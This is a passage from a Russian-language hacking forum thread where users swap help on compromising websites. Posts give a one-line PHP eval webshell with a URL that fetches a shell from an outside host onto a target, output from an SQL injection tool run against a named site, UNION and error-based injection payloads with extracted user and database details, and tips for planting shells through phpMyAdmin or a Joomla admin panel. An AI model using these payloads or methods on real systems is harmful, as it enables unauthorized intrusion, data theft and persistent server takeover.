Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    нет версию и дбнайм я сам смогу взят но кто нит подскажите как далше вывести имена таблиц и колонок
     
  2. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    355
    Likes Received:
    314
    Reputations:
    163
    льешь <?php eval(stripslashes($_GET[id])); ?>

    http://site.ru/shell.php?id=copy('http://google.ru/shell.php','/куда/лить/shell.php');
     
    3 people like this.
  3. GOGA075

    GOGA075 Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    208
    Likes Received:
    10
    Reputations:
    11
    Пипл, подскажите, есть доступ к phpMyAdmin. Как залить полноценный шел?
     
  4. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    http://forum.antichat.ru/showthread.php?p=1000812
     
    _________________________
  5. GOGA075

    GOGA075 Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    208
    Likes Received:
    10
    Reputations:
    11
    Konqi, а это разве полноценный шел получиться??
     
  6. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    http://forum.antichat.ru/showthread.php?t=43015
    http://defeated.ru/showthread.php?p=9987
     
    _________________________
  7. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Code:
    $method = 1; # 1- Post; 0 - GET метод запросов | Post or Get method, 1-POST; 0-GET
    $f_table = "information_schema.tables"; # 
    $f_url = "http://www.hack0wn.com/view.php?xroot=271.0+and+(select+1+from+"; # url
    $f_plus = "+"; # %20,%2b & etc.
    $f_filtr = "a)--+&cat=exploits"; # close SQL
    
    -----------------------------------------
    System information:
    -----------------------------------------
    base:hack0wn
    basedir:/usr/
    datadir:/var/lib/mysql/
    os:redhat-linux-gnu
    tmpdir:/tmp/
    ver:5.0.86-log
    -----------------------------------------
    Tables in information_schema.tables - 27
    -----------------------------------------
    ROUTINES
    VIEWS
    SCHEMA_PRIVILEGES
    advisories
    SCHEMATA
    bins
    PROFILING
    exploits
    KEY_COLUMN_USAGE
    comments
    COLLATIONS
    TABLE_CONSTRAINTS
    profiles
    COLUMN_PRIVILEGES
    TABLE_PRIVILEGES
    shellcodes
    COLUMNS
    TRIGGERS
    sources
    CHARACTER_SETS
    TABLES
    papers
    COLLATION_CHARACTER_SET_APPLICABILITY
    USER_PRIVILEGES
    videos
    STATISTICS
    misc
    
    https://forum.antichat.net/thread148915-toolza.html
     
    #12527 Pashkela, 26 Apr 2010
    Last edited: 26 Apr 2010
    1 person likes this.
  8. auth_root

    auth_root Member

    Joined:
    31 Jan 2010
    Messages:
    17
    Likes Received:
    10
    Reputations:
    0
    Pashkela
    Это чем?
     
  9. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    раскрутил скулю Postgresql, залил шелл..но на сервере крутится еще и MySQL.. как мне к базе с постгре подключится? к мускулю подключение нормальноe
     
  10. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196

    http://phppgadmin.sourceforge.net/
     
    1 person likes this.
  11. [Raz0r]

    [Raz0r] Elder - Старейшина

    Joined:
    25 Feb 2007
    Messages:
    425
    Likes Received:
    484
    Reputations:
    295
    Как вариант WSO
     
    1 person likes this.
  12. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    почему бы не попробовать?

    это только для венды
     
  13. Nek1t

    Nek1t Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    181
    Likes Received:
    16
    Reputations:
    1
    Есть иньекция, но в интересных условиях.
    В кратце: уязвимый параметр используется в нескольких запросах. Скрипт выплевывает данные только после успешной обработки всех запросов. Проблема в том, что количество столбцов в запросах разное.
    Т.е. подбираешь количество столбцов в первом в запросе, он выполняется, а на следующем скрипт крэшится. Из вывода в итоге получаются только ошибки, скрипт просто не дорабатывает до конца.

    PHP:
    http://site.com/index.php?cat=-1+UNION+SELECT+1,2,3,4,5--+
    PHP:
    MySQL error occured on line 68 in file index.php.
    Error 1222The used SELECT statements have a different number of columns
    Query
    : [..query2..]
    PHP:
    http://site.com/index.php?cat=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12--+
    PHP:
    MySQL error occured on line 21 in file index.php.
    Error 1222The used SELECT statements have a different number of columns
    Query
    : [..query1..]

    Any ideas?
     
    #12533 Nek1t, 26 Apr 2010
    Last edited: 26 Apr 2010
  14. Nek1t

    Nek1t Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    181
    Likes Received:
    16
    Reputations:
    1
    Все правильно делаю?
    Ошибку не выдает, пишет item not found, т.е. сам скрипт что-то отлавливает и не выводит MySQL'ную ошибку?

    PHP:
    index.php?id=-1+union+select+count(*),concat(version(),floor(rand(0)*2)),3,4,5,6,7,8,9,10,11+x+from+users+group+by+x--+
    где users - существующая таблица.
     
  15. LokbatanLi

    LokbatanLi Member

    Joined:
    24 Aug 2009
    Messages:
    170
    Likes Received:
    20
    Reputations:
    -10
    tak probuy

    http://site.com/index.php?cat=(select*from(select+name_const(version(),1),name_const(version(),1))a)
     
    2 people like this.
  16. Nek1t

    Nek1t Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    181
    Likes Received:
    16
    Reputations:
    1
    Работает, но
    уже не работает: Error 1210: Incorrect arguments to NAME_CONST
    Либо я не понял принципа, либо в чем-то другом проблема?
     
  17. LokbatanLi

    LokbatanLi Member

    Joined:
    24 Aug 2009
    Messages:
    170
    Likes Received:
    20
    Reputations:
    -10
    vot..

    user()
    [email protected]

    database()
    Sql115794_4

    @@version_compile_os
    redhat-linux-gnu
     
  18. GOGA075

    GOGA075 Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    208
    Likes Received:
    10
    Reputations:
    11
    Пипл, кто юзал Joomla! 1.0.15 Lavra Edition 2008
    подскажите как шел залить...
    Или php код воспроизвести!!
     
    1 person likes this.
  19. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    в джумле легко шелл залить если есть доступ в админку, устанавливаешь там модуль джумла ксплорер и через него уже спокойно делаешь свои дела
     
  20. GOGA075

    GOGA075 Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    208
    Likes Received:
    10
    Reputations:
    11
    Gorev, а можно по подробнее.
    Доступ к админке есть....
     
Thread Status:
Not open for further replies.